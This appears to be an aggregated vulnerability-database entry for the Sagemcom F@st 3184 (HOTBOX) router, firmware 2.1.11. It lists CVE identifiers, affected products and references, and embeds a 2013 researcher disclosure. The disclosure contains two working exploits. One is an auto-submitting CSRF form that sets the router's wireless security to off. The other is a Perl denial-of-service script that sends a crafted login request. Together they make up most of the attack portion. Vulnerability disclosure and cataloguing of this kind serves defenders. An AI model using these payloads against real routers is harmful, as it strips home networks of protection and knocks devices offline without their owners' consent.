ID

VAR-E-201309-0002


CVE

cve_id:CVE-2013-5037

Trust: 3.0

cve_id:CVE-2013-5220

Trust: 1.8

cve_id:CVE-2013-5219

Trust: 1.8

cve_id:CVE-2013-5038

Trust: 1.8

cve_id:CVE-2013-5039

Trust: 1.8

cve_id:CVE-2013-5218

Trust: 1.8

sources: BID: 63550 // PACKETSTORM: 123901 // EXPLOIT-DB: 29518 // EDBNET: 21266 // EDBNET: 51281

EDB ID

29518


TITLE

Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 29518

DESCRIPTION

Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities. CVE-2013-5220, CVE-99381, CVE-2013-5219, CVE-2013-5218, CVE-2013-5039, CVE-2013-5038, CVE-2013-5037, CVE-99360, CVE-99359, CVE-99358, CVE-99357, CVE-99356. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 29518

AFFECTED PRODUCTS

vendor: sagemcom, model: f@st, scope: eq, version: 31842.1.11

Trust: 1.0

vendor: sagemcom, model: [email protected], scope: eq, version: 31842.1.11

Trust: 0.6

vendor: hotbox, model: -, scope: eq, version: 2.1.11

Trust: 0.5

vendor: sagecom, model: f@st router, scope: eq, version: 31842.1.11

Trust: 0.3

sources: BID: 63550 // PACKETSTORM: 123901 // EXPLOIT-DB: 29518 // EDBNET: 51281

EXPLOIT

+------------------------------------------------------------------------------+
| HOTBOX is the leading router/modem appliance of |
| HOT Cable communication company in Israel. |
| The Appliance is manufactured by SAGEMCOM |
| and carries the model name F@st 3184. |
+------------------------------------------------------------------------------+
| Title: HOTBOX Multiple Vulnerabilities |
+--------------------+---------------------------------------------------------+
| Release Date | 2013/09/09 |
| Researcher | Oz Elisyan |
+--------------------+---------------------------------------------------------+
| System Affected | HOTBOX Router/Modem |
| Versions Affected | 2.1.11 , possibly earlier |
| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|
| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, |
| CVE-2013-5039 |
| Vendor Patched | N/A |
| Classification | 0-day |
| Exploits | http://elisyan.com/hotboxDoS.pl, |
| http://elisyan.com/hotboxCSRF.html |
+--------------------+---------------------------------------------------------+

Vulnerabilities List -
# Default WPS Pin
# Authentication based on IP Address
# DoS via crafted POST
# Path/Directory Traversal
# Script injection via DHCP request
# No CSRF Token

Demo -
http://www.youtube.com/watch?v=CPlT09ZIj48

CSRF EXPLOIT:

<html>
<form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1>
<input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr">
<input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1">
<input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1">
<input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode">
<input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1">
<input type=hidden name="NBandwidth1" value="20" id="NBandwidth1">
<input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1">
<input type=hidden name="WifiSecurity" value="0" id="WifiSecurity">
<input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity">
<input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1">
<input type=hidden name="scanActions1" value="0" id="scanActions1">
<input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1">
<input type=hidden name="wpsActions1" value="0" id="wpsActions1">

</form>
</html>
<script>document.getElementById(1).submit();</script>

DENIAL OF SERVICE EXPLOIT:

use warnings;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

# Author: Oz Elisyan
# Date: 3 September 2013
# Affected Version: <= 2.1.11

print "# HOTBOX DoS PoC #\n\n";

unless ($ARGV[0]){
print "Please Enter Valid Host Name.\n";
exit();
}

print "Sending Evil POST request...\n";

my $HOST = $ARGV[0];
my $URL = "http://$HOST/goform/login";
my $PostData = "loginUsername=aaaloginPassword=aaa";
my $browser = LWP::UserAgent->new();
my $req = HTTP::Request->new(POST => $URL);
$req->content_type("application/x-www-form-urlencoded");
$req->content($PostData);
my $resp = $browser->request($req);

print "Done.";

Trust: 1.0

sources: EXPLOIT-DB: 29518

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 29518

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 29518

TYPE

Multiple Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 29518 // EDBNET: 51281

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:proof of concept

Trust: 0.5

tag:file inclusion

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 123901

CREDITS

Oz Elisyan

Trust: 0.6

sources: EXPLOIT-DB: 29518

EXTERNAL IDS

db: NVD, id: CVE-2013-5037

Trust: 3.0

db: NVD, id: CVE-2013-5220

Trust: 1.8

db: NVD, id: CVE-2013-5219

Trust: 1.8

db: NVD, id: CVE-2013-5038

Trust: 1.8

db: NVD, id: CVE-2013-5039

Trust: 1.8

db: NVD, id: CVE-2013-5218

Trust: 1.8

db: EXPLOIT-DB, id: 29518

Trust: 1.6

db: 0DAYTODAY, id: 21465

Trust: 0.6

db: EDBNET, id: 21266

Trust: 0.6

db: EDBNET, id: 51281

Trust: 0.6

db: PACKETSTORM, id: 123901

Trust: 0.5

db: BID, id: 63550

Trust: 0.3

sources: BID: 63550 // PACKETSTORM: 123901 // EXPLOIT-DB: 29518 // EDBNET: 21266 // EDBNET: 51281

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-5037

Trust: 2.7

url:https://nvd.nist.gov/vuln/detail/cve-2013-5220

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-5038

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-5219

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-5039

Trust: 1.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-5218

Trust: 1.5

url:https://0day.today/exploits/21465

Trust: 0.6

url:https://www.exploit-db.com/exploits/29518/

Trust: 0.6

url:http://www.sagemcom.com/index.php?id=1760&l=25

Trust: 0.3

url:http://seclists.org/fulldisclosure/2013/nov/17

Trust: 0.3

sources: BID: 63550 // PACKETSTORM: 123901 // EXPLOIT-DB: 29518 // EDBNET: 21266 // EDBNET: 51281

SOURCES

db: BID, id: 63550
db: PACKETSTORM, id: 123901
db: EXPLOIT-DB, id: 29518
db: EDBNET, id: 21266
db: EDBNET, id: 51281

LAST UPDATE DATE

2022-07-27T09:45:13.202000+00:00


SOURCES UPDATE DATE

db: BID, id: 63550, date: 2013-09-09T00:00:00

SOURCES RELEASE DATE

db: BID, id: 63550, date: 2013-09-09T00:00:00
db: PACKETSTORM, id: 123901, date: 2013-11-04T13:03:33
db: EXPLOIT-DB, id: 29518, date: 2013-11-08T00:00:00
db: EDBNET, id: 21266, date: 2013-11-05T00:00:00
db: EDBNET, id: 51281, date: 2013-11-08T00:00:00